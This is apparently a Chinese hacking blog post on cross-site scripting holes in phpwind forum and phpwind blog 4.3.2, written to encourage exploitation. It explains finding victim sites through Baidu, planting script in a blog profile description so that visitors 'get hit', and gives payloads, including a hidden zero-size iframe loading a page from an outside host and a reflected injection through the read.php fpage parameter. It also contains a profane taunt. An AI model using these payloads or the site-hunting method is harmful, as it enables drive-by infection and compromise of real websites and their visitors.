PS:首先鄙视下X人.把本站的文献转走了不写明来源.还加了个闪亮的原创.晕死...
这几天一直在关注Internet Explorer 7 .很久都没出来活动活动了.
汗!网络上又爆出phpwind存在漏洞.不仅仅是跨站那么简单.当然了phpwind blog也存在此漏洞
想必大家也都知道跨站的好处吧.嘿嘿.跨站这东西我就不多说了.%90站可以可以跨.比如:
在百度上搜phpwind blog 4.3.2就是使用phwind blog用户的网站
具体的方法就是在blog处注册个号.然后在描述处填入跨站代码.附件那里随便填.保存下就会生成一个地址
浏览这个叶子就会中标.!简直是个杀人越货的好东西.
跨站代码如:
〈script〉alert(’fuck your mather’)〈/script〉
〈iframe src=http://94pt.com/hsqq.htm width=0 height=0〉
至于phpwind版本存在跨站漏洞.比如浏览个phpwind叶子.邪八吧.cnlnfjhh在他自己的小驿站里面也发了很多test PS
测试图片:
具体就是read.php?tid=xxxx&fpage〉’〉〈script〉alert(’fuck your mather’)〈/script〉
[1] [2] 下一页
[组图]PHPWind跨站漏洞入侵
您现在的位置: